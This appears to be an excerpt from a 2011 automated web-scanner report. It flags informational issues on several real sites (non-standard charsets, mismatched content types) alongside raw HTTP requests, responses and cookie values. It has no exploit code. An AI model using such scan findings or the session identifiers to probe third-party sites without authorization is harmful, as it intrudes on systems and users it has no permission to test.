HTTP/1.1 400 Bad Request Connection: close Date: Wed, 26 Jan 2011 14:55:40 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html Cache-Control: no-cache, max-age=0, must-revalidate Pragma: no-cache Expires: Wed, 26 Jan 2011 14:55:40 GMT Content-Length: 77
GET /cringely/pulpit/ HTTP/1.1 Host: www.pbs.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 26 Jan 2011 14:57:09 GMT Server: Apache/2.2.17 (Unix) Set-Cookie: www.apache.sid=a407b02ae7db3726c0e6bb20994d70e7; path=/; domain=.pbs.org Accept-Ranges: bytes Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 33427
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.o ...[SNIP]...
The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:
UTF-8
iso
Issue background
Applications may specify a non-standard character set as a result of typographical errors within the code base, or because of intentional usage of an unusual character set that is not universally recognised by browsers. If the browser does not recognise the character set specified by the application, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.
In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.
Request
GET /products/desktop-central/index.html HTTP/1.1 Host: www.manageengine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 26 Jan 2011 14:57:01 GMT Server: Apache Last-Modified: Mon, 24 Jan 2011 13:46:19 GMT ETag: "16060-d315c0c0" Accept-Ranges: bytes Content-Length: 90208 Cache-Control: max-age=604800 Expires: Wed, 02 Feb 2011 14:57:01 GMT Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8
If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.
In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.
The response contains the following Content-type statement:
Content-Type: text/html; charset=utf-8
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /api/ctatools/CreateCookie.aspx HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 180 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:48:11 GMT Connection: close
Invalid "cta" argument. Correct values are any on of the following: "ask-a-q", "connect-to-blog", "general-value", "invite-peers", "join", "join-group", "blog-start"<!-- No CTA -->
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain script.
Request
GET /blogs/ppmtoday/categories/future+states/2379 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 404 Not Found Content-Type: text/html Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:46:12 GMT Connection: close Content-Length: 103
The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain script.
Request
GET /blogs/ppmtoday/categories/recommended+reading/1191 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 404 Not Found Content-Type: text/html Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:46:12 GMT Connection: close Content-Length: 103
The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain script.
Request
GET /blogs/ppmtoday/categories/thinking+out+loud/2765 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 404 Not Found Content-Type: text/html Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:46:16 GMT Connection: close Content-Length: 103
The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain script.
Request
GET /blogs/ppmtoday/categories/war+stories/1192 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 404 Not Found Content-Type: text/html Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:46:17 GMT Connection: close Content-Length: 103
The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain script.
Request
GET /blogs/ppmtoday/categories/white+papers/1193 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 404 Not Found Content-Type: text/html Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:46:17 GMT Connection: close Content-Length: 103
The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.